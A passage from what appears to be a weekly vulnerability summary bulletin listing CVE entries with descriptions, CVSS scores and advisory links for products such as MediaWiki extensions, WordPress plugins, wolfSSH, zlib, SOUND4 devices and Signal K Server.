| Wikimedia Foundation--MediaWiki - CSS extension | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Wikimedia Foundation MediaWiki - CSS extension allows Path Traversal.This issue affects MediaWiki - CSS extension: 1.44, 1.43, 1.39. | 2026-01-07 | not yet calculated | CVE-2026-0669 | https://phabricator.wikimedia.org/T401526 https://gerrit.wikimedia.org/r/q/Ia15bf3f2e5a341868568492a736ac3dbf706c22e |
| Wikimedia Foundation--MediaWiki - ProofreadPage Extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki - ProofreadPage Extension allows Cross-Site Scripting (XSS).This issue affects MediaWiki - ProofreadPage Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-07 | not yet calculated | CVE-2026-0670 | https://phabricator.wikimedia.org/T409423 https://gerrit.wikimedia.org/r/q/I7c028db5ed81843aacd596b0ee4dc2980f5b6e3c |
| Wikimedia Foundation--MediaWiki - UploadWizard extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki - UploadWizard extension allows Cross-Site Scripting (XSS).This issue affects MediaWiki - UploadWizard extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-08 | not yet calculated | CVE-2026-0671 | https://phabricator.wikimedia.org/T407157 https://gerrit.wikimedia.org/r/q/I16de2211594ea9a686868ad7789f9879bf981fa1 |
| Wikimedia Foundation--MediaWiki - VisualData Extension | Inefficient Regular Expression Complexity vulnerability in Wikimedia Foundation MediaWiki - VisualData Extension allows Regular Expression Exponential Blowup.This issue affects MediaWiki - VisualData Extension: 1.45. | 2026-01-07 | not yet calculated | CVE-2026-0668 | https://phabricator.wikimedia.org/T387008 https://gerrit.wikimedia.org/r/q/Ie08d9a8ceb2c9a22a635cfc27964353f14072dbf https://gerrit.wikimedia.org/r/q/Ifbf9c2ade621226e14fe852f3217293772bf8bb8 https://gerrit.wikimedia.org/r/q/I893a9fca694a2613e29e149dea2d76d7f06063e5 https://gerrit.wikimedia.org/r/q/I4ff2737c9f0ba805267d1fc8296e7cff61241ee3 |
| WofficeIO--Woffice | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WofficeIO Woffice woffice allows Reflected XSS.This issue affects Woffice: from n/a through <= 5.4.30. | 2026-01-08 | not yet calculated | CVE-2025-67918 | https://vdp.patchstack.com/database/Wordpress/Theme/woffice/vulnerability/wordpress-woffice-theme-5-4-30-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WofficeIO--Woffice Core | Authorization Bypass Through User-Controlled Key vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Woffice Core: from n/a through <= 5.4.30. | 2026-01-08 | not yet calculated | CVE-2025-67919 | https://vdp.patchstack.com/database/Wordpress/Plugin/woffice-core/vulnerability/wordpress-woffice-core-plugin-5-4-30-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| wolfSSL--wolfSSH | wolfSSH's key exchange state machine can be manipulated to leak the client's password in the clear, trick the client to send a bogus signature, or trick the client into skipping user authentication. This affects client applications with wolfSSH version 1.4.21 and earlier. Users of wolfSSH must update or apply the fix patch and it's recommended to update credentials used. This fix is also recommended for wolfSSH server applications. While there aren't any specific attacks on server applications, the same defect is present. Thanks to Aina Toky Rasoamanana of Valeo and Olivier Levillain of Telecom SudParis for the report. | 2026-01-06 | not yet calculated | CVE-2025-14942 | https://github.com/wolfSSL/wolfssh/pull/855 |
| wolfSSL--wolfSSH | A heap buffer over-read vulnerability exists in the wolfSSH_CleanPath() function in wolfSSH. An authenticated remote attacker can trigger the issue via crafted SCP path input containing '/./' sequences, resulting in a heap over read by 1 byte. | 2026-01-06 | not yet calculated | CVE-2025-15382 | https://github.com/wolfSSL/wolfssh/pull/859 |
| wolfSSL--wolfSSL-py | A vulnerability in the handling of verify_mode = CERT_REQUIRED in the wolfssl Python package (wolfssl-py) causes client certificate requirements to not be fully enforced. Because the WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT flag was not included, the behavior effectively matched CERT_OPTIONAL: a peer certificate was verified if presented, but connections were incorrectly authenticated when no client certificate was provided. This results in improper authentication, allowing attackers to bypass mutual TLS (mTLS) client authentication by omitting a client certificate during the TLS handshake. The issue affects versions up to and including 5.8.2. | 2026-01-07 | not yet calculated | CVE-2025-15346 | https://github.com/wolfSSL/wolfssl-py/pull/62 https://github.com/wolfSSL/wolfssl-py/commit/b4517dece79f682a8f453abce5cfc0b81bae769d https://github.com/wolfSSL/wolfssl-py/releases/tag/v5.8.4-stable |
| WPCenter--AffiliateX | Missing Authorization vulnerability in WPCenter AffiliateX affiliatex allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AffiliateX: from n/a through <= 1.3.9.3. | 2026-01-06 | not yet calculated | CVE-2025-69346 | https://vdp.patchstack.com/database/Wordpress/Plugin/affiliatex/vulnerability/wordpress-affiliatex-plugin-1-3-9-3-broken-access-control-vulnerability?_s_id=cve |
| WPFactory--Wishlist for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Wishlist for WooCommerce wish-list-for-woocommerce allows Stored XSS.This issue affects Wishlist for WooCommerce: from n/a through <= 3.3.0. | 2026-01-06 | not yet calculated | CVE-2025-69334 | https://vdp.patchstack.com/database/Wordpress/Plugin/wish-list-for-woocommerce/vulnerability/wordpress-wishlist-for-woocommerce-plugin-3-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WPFunnels--Creator LMS | Missing Authorization vulnerability in WPFunnels Creator LMS creatorlms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Creator LMS: from n/a through <= 1.1.12. | 2026-01-06 | not yet calculated | CVE-2025-69359 | https://vdp.patchstack.com/database/Wordpress/Plugin/creatorlms/vulnerability/wordpress-creator-lms-plugin-1-1-12-broken-access-control-vulnerability?_s_id=cve |
| yintibao--Fun Print Mobile | Exported Activity allows external applications to gain application context and directly launch Gmail with inbox access, bypassing security controls. | 2026-01-08 | not yet calculated | CVE-2025-15464 | https://korelogic.com/Resources/Advisories/KL-001-2026-001.txt |
| zlib software--zlib | zlib versions up to and including 1.3.1.2 contain a global buffer overflow in the untgz utility. The TGZfname() function copies an attacker-supplied archive name from argv[] into a fixed-size 1024-byte static global buffer using an unbounded strcpy() call without length validation. Supplying an archive name longer than 1024 bytes results in an out-of-bounds write that can lead to memory corruption, denial of service, and potentially code execution depending on compiler, build flags, architecture, and memory layout. The overflow occurs prior to any archive parsing or validation. | 2026-01-07 | not yet calculated | CVE-2026-22184 | https://seclists.org/fulldisclosure/2026/Jan/3 https://zlib.net/ https://github.com/madler/zlib https://www.vulncheck.com/advisories/zlib-untgz-global-buffer-overflow-in-tgzfname |
| zozothemes--Corpkit | Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Corpkit corpkit allows Upload a Web Shell to a Web Server.This issue affects Corpkit: from n/a through <= 2.0. | 2026-01-08 | not yet calculated | CVE-2025-67924 | https://vdp.patchstack.com/database/Wordpress/Theme/corpkit/vulnerability/wordpress-corpkit-theme-2-0-arbitrary-file-upload-vulnerability?_s_id=cve |
| zozothemes--Corpkit | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Corpkit corpkit allows PHP Local File Inclusion.This issue affects Corpkit: from n/a through <= 2.0. | 2026-01-08 | not yet calculated | CVE-2025-67925 | https://vdp.patchstack.com/database/Wordpress/Theme/corpkit/vulnerability/wordpress-corpkit-theme-2-0-local-file-inclusion-vulnerability?_s_id=cve |
Vulnerability Summary for the Week of December 29, 2025
Posted on Monday January 05, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| SmarterTools--SmarterMail | Successful exploitation of the vulnerability could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution. | 2025-12-29 | 10 | CVE-2025-52691 | https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-124/ |
| MiniDVBLinux--MiniDVBLinux | MiniDVBLinux 5.4 contains a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary commands as root through the 'command' GET parameter. Attackers can exploit the /tpl/commands.sh endpoint by sending malicious command values to gain root-level system access. | 2025-12-30 | 9.8 | CVE-2022-50691 | Zero Science Lab Disclosure (ZSL-2022-5718) Packet Storm Security Exploit Entry VulnCheck Advisory: MiniDVBLinux 5.4 Remote Root Command Execution via commands.sh |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x contains a network vulnerability that allows unauthenticated attackers to send ICMP signals to arbitrary hosts through network command scripts. Attackers can abuse ping.php, traceroute.php, and dns.php to generate network flooding attacks targeting external hosts. | 2025-12-30 | 9.8 | CVE-2022-50695 | Zero Science Lab Disclosure (ZSL-2022-5728) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x ICMP Flood Attack via Network Commands |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated vulnerability that allows remote attackers to access live radio stream information through webplay or ffmpeg scripts. Attackers can exploit the vulnerability by calling specific web scripts to disclose radio stream details without requiring authentication. | 2025-12-30 | 9.8 | CVE-2022-50790 | Zero Science Lab Disclosure (ZSL-2022-5734) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Radio Stream Disclosure |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated file disclosure vulnerability that allows remote attackers to access sensitive system files. Attackers can exploit the vulnerability by manipulating the 'file' GET parameter to disclose arbitrary files on the affected device. | 2025-12-30 | 9.8 | CVE-2022-50792 | Zero Science Lab Disclosure (ZSL-2022-5736) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated File Disclosure Vulnerability |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated command injection vulnerability in the username parameter. Attackers can exploit index.php and login.php scripts by injecting arbitrary shell commands through the HTTP POST 'username' parameter to execute system commands. | 2025-12-30 | 9.8 | CVE-2022-50794 | Zero Science Lab Disclosure (ZSL-2022-5739) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Command Injection via Username |
| JM-DATA ONU--JF511-TV | JM-DATA ONU JF511-TV version 1.0.67 uses default credentials that allow attackers to gain unauthorized access to the device with administrative privileges. | 2025-12-30 | 9.8 | CVE-2022-50803 | Zero Science Lab Disclosure (ZSL-2022-5708) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Entry JM-DATA Vendor Homepage VulnCheck Advisory: JM-DATA ONU JF511-TV 1.0.67 Default Credentials Vulnerability |
| The Akuvox Company--Akuvox Smart Doorphone | Akuvox Smart Intercom S539 contains an unauthenticated vulnerability that allows remote attackers to access live video streams by requesting the video.cgi endpoint on port 8080. Attackers can retrieve video stream data without authentication by directly accessing the specified endpoint on affected Akuvox doorphone and intercom devices. | 2025-12-30 | 9.8 | CVE-2024-58336 | Zero Science Lab Disclosure (ZSL-2024-5826) Packet Storm Security Exploit Entry VulnCheck Advisory: Akuvox Smart Intercom S539 Unauthenticated Video Stream Disclosure |
| Ateme--Flamingo XL | Anevia Flamingo XL 3.2.9 contains a restricted shell vulnerability that allows remote attackers to escape the sandboxed environment through the traceroute command. Attackers can exploit the traceroute command to inject shell commands and gain full root access to the device by bypassing the restricted login environment. | 2025-12-30 | 9.8 | CVE-2024-58338 | ExploitDB-51516 Ateme Vendor Homepage Zero Science Lab Disclosure (ZSL-2023-5780) VulnCheck Advisory: Anevia Flamingo XL 3.2.9 Remote Root Jailbreak via Traceroute Command |
| wpmudev--Branda White Label & Branding, Free Login Page Customizer | The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2026-01-02 | 9.8 | CVE-2025-14998 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae46be82-570f-4172-9c3f-746b894b84b9?source=cve https://plugins.trac.wordpress.org/browser/branda-white-labeling/tags/3.4.24/inc/modules/login-screen/signup-password.php#L24 https://plugins.trac.wordpress.org/changeset/3429115/branda-white-labeling#file1749 |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Password Protection Bypass | 2025-12-30 | 9.1 | CVE-2025-15102 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 Home Automation version 1.6 contains a critical security flaw that exposes the alarm system PIN in the 'basisInfo' XML file after authentication. Attackers can retrieve the PIN from the server response to bypass security measures and disable the alarm system without additional authentication. | 2025-12-30 | 9.8 | CVE-2025-15114 | Zero Science Lab Disclosure (ZSL-2025-5929) VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 PIN Exposure Vulnerability |
| D-Link--DIR-600 | A vulnerability was found in D-Link DIR-600 up to 2.15WWb02. Affected by this vulnerability is an unknown functionality of the file hedwig.cgi of the component HTTP Header Handler. The manipulation of the argument Cookie results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-29 | 9.8 | CVE-2025-15194 | VDB-338581 | D-Link DIR-600 HTTP Header hedwig.cgi stack-based overflow VDB-338581 | CTI Indicators (IOB, IOC, IOA) Submit #724404 | D-Link DIR-600 v2.15WWb02 and possibly earlier versions Stack-based Buffer Overflow https://github.com/LonTan0/CVE/blob/main/Stack-Based%20Buffer%20Overflow%20Vulnerability%20in%20hedwig.cgi%20of%20D-Link%20DIR-600.md https://github.com/LonTan0/CVE/blob/main/Stack-Based%20Buffer%20Overflow%20Vulnerability%20in%20hedwig.cgi%20of%20D-Link%20DIR-600.md#poc https://www.dlink.com/ |
| Sunnet--WMPro | WMPro developed by Sunnet has a Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2025-12-29 | 9.8 | CVE-2025-15226 | https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html https://www.twcert.org.tw/en/cp-139-10603-67149-2.html |
| WELLTEND TECHNOLOGY--BPMFlowWebkit | BPMFlowWebkit developed by WELLTEND TECHNOLOGY has a Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2025-12-29 | 9.8 | CVE-2025-15228 | https://www.twcert.org.tw/tw/cp-132-10604-c65aa-1.html https://www.twcert.org.tw/en/cp-139-10605-426b6-2.html |
| Tenda--W6-S | A vulnerability was determined in Tenda W6-S 1.0.0.4(510). This impacts an unknown function of the file /bin/httpd of the component R7websSsecurityHandler. Executing manipulation of the argument Cookie can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 9.8 | CVE-2025-15255 | VDB-338645 | Tenda W6-S R7websSsecurityHandler httpd stack-based overflow VDB-338645 | CTI Indicators (IOB, IOC, IOA) Submit #725500 | Tenda W6-S V1.0.0.4(510) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/R7WebsSecurityHandler.md https://www.tenda.com.cn/ |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Out-of-bound memory write Vulnerability | 2025-12-30 | 9.1 | CVE-2025-15359 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| ConoHa by GMO--WING WordPress Migrator | Cross-Site Request Forgery (CSRF) vulnerability in ConoHa by GMO WING WordPress Migrator allows Upload a Web Shell to a Web Server.This issue affects WING WordPress Migrator: from n/a through 1.1.9. | 2025-12-30 | 9.6 | CVE-2025-52835 | https://vdp.patchstack.com/database/wordpress/plugin/wing-migrator/vulnerability/wordpress-wing-wordpress-migrator-plugin-1-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.19.0, an unauthenticated attacker can pollute the internal state (`restoreFilePath`) of the server via the `/skServer/validateBackup` endpoint. This allows the attacker to hijack the administrator's "Restore" functionality to overwrite critical server configuration files (e.g., `security.json`, `package.json`), leading to account takeover and Remote Code Execution (RCE). Version 2.19.0 patches this vulnerability. | 2026-01-01 | 9.7 | CVE-2025-66398 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| RomanCode--MapSVG | Unrestricted Upload of File with Dangerous Type vulnerability in RomanCode MapSVG allows Upload a Web Shell to a Web Server.This issue affects MapSVG: from n/a through 8.7.3. | 2025-12-29 | 9.9 | CVE-2025-68562 | https://vdp.patchstack.com/database/wordpress/plugin/mapsvg-lite-interactive-vector-maps/vulnerability/wordpress-mapsvg-plugin-8-7-3-arbitrary-file-upload-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Versions prior to 2.19.0 expose two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status. The first is Unauthenticated WebSocket Request Enumeration: When a WebSocket client connects to the SignalK stream endpoint with the `serverevents=all` query parameter, the server sends all cached server events including `ACCESS_REQUEST` events that contain details about pending access requests. The `startServerEvents` function iterates over `app.lastServerEvents` and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when `allow_readonly` is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses. The second is Unauthenticated Token Polling: The access request status endpoint at `/signalk/v1/access/requests/:id` returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The `queryRequest` function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access. An attacker has two paths to exploit these vulnerabilities. Either the attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token; or the attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials. Both paths require zero authentication and enable complete authentication bypass. Version 2.19.0 fixes the underlying issues. | 2026-01-01 | 9.1 | CVE-2025-68620 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| Mobile Builder--Mobile builder | Authentication Bypass Using an Alternate Path or Channel vulnerability in Mobile Builder Mobile builder allows Authentication Abuse.This issue affects Mobile builder: from n/a through 1.4.2. | 2025-12-29 | 9.8 | CVE-2025-68860 | https://vdp.patchstack.com/database/wordpress/plugin/mobile-builder/vulnerability/wordpress-mobile-builder-plugin-1-4-2-broken-authentication-vulnerability?_s_id=cve |
| Mohammad I. Okfie--IF AS Shortcode | Improper Control of Generation of Code ('Code Injection') vulnerability in Mohammad I. Okfie IF AS Shortcode allows Code Injection.This issue affects IF AS Shortcode: from n/a through 1.2. | 2025-12-29 | 9.9 | CVE-2025-68897 | https://vdp.patchstack.com/database/wordpress/plugin/if-as-shortcode/vulnerability/wordpress-if-as-shortcode-plugin-1-2-remote-code-execution-rce-vulnerability?_s_id=cve |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.77, RustFS implements gRPC authentication using a hardcoded static token `"rustfs rpc"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.77 contains a fix for the issue. | 2025-12-30 | 9.8 | CVE-2025-68926 | https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 14.99.6 and 15.88.1, an authenticated user with specific permissions could be tricked into accessing a specially crafted link. This could lead to a malicious template being executed on the server, resulting in remote code execution. Versions 14.99.6 and 15.88.1 fix the issue. No known workarounds are available. | 2025-12-29 | 9.1 | CVE-2025-68929 | https://github.com/frappe/frappe/security/advisories/GHSA-qq98-vfv9-xmxh https://github.com/frappe/frappe/releases/tag/v14.99.6 https://github.com/frappe/frappe/releases/tag/v15.88.1 |
| kromitgmbh--titra | Titra is open source project time tracking software. Prior to version 0.99.49, Titra allows any authenticated Admin user to modify the timeEntryRule in the database. The value is then passed to a NodeVM value to execute as code. Without sanitization, it leads to a Remote Code Execution. Version 0.99.49 fixes the issue. | 2025-12-31 | 9.1 | CVE-2025-69288 | https://github.com/kromitgmbh/titra/security/advisories/GHSA-pqgx-6wg3-gmvr https://github.com/kromitgmbh/titra/commit/2e2ac5cbeed47a76720b21c7fde0214a242e065e https://github.com/kromitgmbh/titra/releases/tag/0.99.49 |
| Selea--Selea CarPlateServer (CPS) | Selea CarPlateServer 4.0.1.6 contains an unquoted service path vulnerability in the Windows service configuration that allows local users to potentially execute code with elevated privileges. Attackers can exploit the service's unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during application startup or reboot. | 2025-12-31 | 8.4 | CVE-2020-36903 | ExploitDB-49453 Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5621) VulnCheck Advisory: Selea CarPlateServer 4.0.1.6 Local Privilege Escalation via Unquoted Service Path |
| Epic Games Inc.--Epic Games Psyonix Rocket League | Epic Games Psyonix Rocket League <=1.95 contains an insecure permissions vulnerability that allows authenticated users to modify executable files with full access permissions. Attackers can leverage the 'F' (Full) flag for the 'Authenticated Users' group to change executable files and potentially escalate system privileges. | 2025-12-31 | 8.8 | CVE-2021-47742 | Zero Science Lab Disclosure (ZSL-2021-5650) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry Rocket League Product Homepage VulnCheck Advisory: Epic Games Psyonix Rocket League <=1.95 Elevation of Privileges via Insecure Permissions |
| Cypress--200 | Cypress Solutions CTM-200 2.7.1 contains an authenticated command injection vulnerability in the firmware upgrade script that allows remote attackers to execute shell commands. Attackers can exploit the 'fw_url' parameter in the ctm-config-upgrade.sh script to inject and execute arbitrary commands with root privileges. | 2025-12-31 | 8.8 | CVE-2021-47745 | ExploitDB-50408 Cypress Solutions Product Homepage Zero Science Lab Disclosure (ZSL-2021-5687) VulnCheck Advisory: Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection via Firmware Upgrade |
| Metern--meterN | meterN 1.2.3 contains an authenticated remote code execution vulnerability in admin_meter2.php and admin_indicator2.php scripts. Attackers can exploit the 'COMMANDx' and 'LIVECOMMANDx' POST parameters to execute arbitrary system commands with administrative privileges. | 2025-12-31 | 8.8 | CVE-2021-47747 | ExploitDB-50596 Archived Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5690) VulnCheck Advisory: meterN 1.2.3 Authenticated Remote Code Execution via Admin Scripts |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an SQL injection vulnerability in the 'username' POST parameter of index.php that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through the username parameter to bypass authentication and potentially access unauthorized database information. | 2025-12-30 | 8.2 | CVE-2022-50694 | Zero Science Lab Disclosure (ZSL-2022-5727) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x SQL Injection via Username Parameter |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains a command injection vulnerability that allows local authenticated users to create malicious files in the /tmp directory with .dns.pid extension. Unauthenticated attackers can execute the malicious commands by making a single HTTP POST request to the vulnerable dns.php script, which triggers command execution and then deletes the file. | 2025-12-30 | 8.4 | CVE-2022-50789 | Zero Science Lab Disclosure (ZSL-2022-5733) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Conditional Command Injection via dns.php |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains a conditional command injection vulnerability that allows local authenticated users to create malicious files in the /tmp directory. Unauthenticated attackers can execute commands by making a single HTTP POST request to the vulnerable ping.php script, which triggers the malicious file and then deletes it. | 2025-12-30 | 8.4 | CVE-2022-50791 | Zero Science Lab Disclosure (ZSL-2022-5735) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Conditional Command Injection via ping.php |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an authenticated command injection vulnerability in the www-data-handler.php script that allows attackers to inject system commands through the 'services' POST parameter. Attackers can exploit this vulnerability by crafting malicious 'services' parameter values to execute arbitrary system commands with www-data user privileges. | 2025-12-30 | 8.8 | CVE-2022-50793 | Zero Science Lab Disclosure (ZSL-2022-5737) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authenticated Command Injection via www-data-handler.php |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains a conditional command injection vulnerability that allows local authenticated users to create malicious files in the /tmp directory. Unauthenticated attackers can execute commands by making a single HTTP POST request to the traceroute.php script, which triggers the malicious file and then deletes it after execution. | 2025-12-30 | 8.4 | CVE-2022-50795 | Zero Science Lab Disclosure (ZSL-2022-5740) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Conditional Command Injection via traceroute.php |
| NLB Banka AD Skopje--NLB mKlik Makedonija | NLB mKlik Macedonia 3.3.12 contains a SQL injection vulnerability in international transfer parameters that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through unsanitized input to potentially disclose sensitive information from the mobile banking application. | 2025-12-30 | 8.2 | CVE-2023-54163 | Zero Science Lab Disclosure (ZSL-2023-5797) Google Play Store App Listing Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing VulnCheck Advisory: NLB mKlik Macedonia 3.3.12 SQL Injection via International Transfer Parameters |
| Tosibox Oy--Tosibox Key Service | Tosibox Key Service 3.3.0 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the service startup process by inserting malicious code in the system root path, enabling unauthorized code execution during application startup or system reboot. | 2025-12-30 | 8.4 | CVE-2024-58315 | Zero Science Lab Disclosure (ZSL-2024-5812) Packet Storm Security Exploit Entry Vendor Homepage VulnCheck Advisory: Tosibox Key Service 3.3.0 Local Privilege Escalation via Unquoted Service Path |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Authentication Bypass via Partial Password Disclosure | 2025-12-30 | 8.1 | CVE-2025-15103 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 version 1.6 contains a URL redirection vulnerability in the 'cmdOk.xml' script that allows attackers to manipulate the 'redirectPage' GET parameter. Attackers can craft malicious links that redirect authenticated users to arbitrary websites when clicking on a specially constructed link hosted on a trusted domain. | 2025-12-30 | 8 | CVE-2025-15112 | Zero Science Lab Disclosure (ZSL-2025-5928) Packet Storm Security Exploit Entry Ksenia Security Vendor Homepage VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 URL Redirection Vulnerability |
| D-Link--DWR-M920 | A vulnerability was identified in D-Link DWR-M920 up to 1.1.50. This issue affects the function sub_464794 of the file /boafrm/formDefRoute. The manipulation of the argument submit-url leads to buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-12-29 | 8.8 | CVE-2025-15189 | VDB-338574 | D-Link DWR-M920 formDefRoute sub_464794 buffer overflow VDB-338574 | CTI Indicators (IOB, IOC, IOA) Submit #723552 | D-Link DWR-M920 VV1.1.50 Buffer Overflow https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formDefRoute.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formDefRoute.md#poc https://www.dlink.com/ |
